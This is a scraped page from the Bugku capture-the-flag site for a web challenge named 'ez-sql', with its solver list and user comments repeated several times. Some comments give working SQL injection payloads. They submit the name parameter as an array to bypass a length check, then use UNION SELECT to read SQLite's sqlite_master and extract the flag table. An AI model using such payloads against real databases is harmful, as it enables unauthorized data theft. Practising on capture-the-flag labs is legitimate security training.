ez-sql - Bugku CTF

ez-sqlWEB 未解决

分数: 0 金币: 0

题目作者: 未知

一　　血: xht0525

一血奖励: 0金币

解　　决: 13

提　　示:

描　　述:

just your average sql challenge, nothing else to see here (trust)

其　　他: 下载

不要不要 1月前

举报

bp抓包，URL编码。 name[]=-534249' union select name,sql from sqlite_master--+ 得到表名和建表语句，知道表的字段flag name[]=-534249' union select flag,flag from flag_01ffe035_7ddb_4c79_9a09_8a0b2e6a2705--+

justsosoloveyou 6月前

举报

关键是用name[]=，绕过name.length的长度限制。如：/?name[]=1&name[]=2能够将两个值作为同参数名的数组提交给服务器，但是name=[1,2]，name.length=2。

xht0525 7月前

举报

name[]=changzifuchuan' union select name,name from sqlite_master--

WriteUp

ChinaIT

0 金币

立即查看

ez-sqlWEB 未解决

评论

不要不要 1月前

举报

justsosoloveyou 6月前

举报

xht0525 7月前

举报

WriteUp

ChinaIT

0 金币

评分(1)

解题动态

BrankYeen 攻破了该题 5天前

xiaoxiao972521 攻破了该题 9天前

discu00 攻破了该题 29天前

BusyMsJs 攻破了该题 29天前

不要不要攻破了该题 1月前

fcfc 攻破了该题 1月前

旦提攻破了该题 1月前

ChinaIT 攻破了该题 2月前

admin889 攻破了该题 5月前

justsosoloveyou 攻破了该题 6月前

enderman 攻破了该题 6月前

pamisu 攻破了该题 6月前

xht0525 获得了一血 7月前

ez-sqlWEB 未解决

评论

不要不要 1月前 举报

justsosoloveyou 6月前 举报

xht0525 7月前 举报

WriteUp

ChinaIT

0 金币

评分(1)

解题动态

BrankYeen 攻破了该题 5天前

xiaoxiao972521 攻破了该题 9天前

discu00 攻破了该题 29天前

BusyMsJs 攻破了该题 29天前

不要不要 攻破了该题 1月前

fcfc 攻破了该题 1月前

旦提 攻破了该题 1月前

ChinaIT 攻破了该题 2月前

admin889 攻破了该题 5月前

justsosoloveyou 攻破了该题 6月前

enderman 攻破了该题 6月前

pamisu 攻破了该题 6月前

xht0525 获得了一血 7月前

不要不要 1月前

举报

justsosoloveyou 6月前

举报

xht0525 7月前

举报

不要不要攻破了该题 1月前

旦提攻破了该题 1月前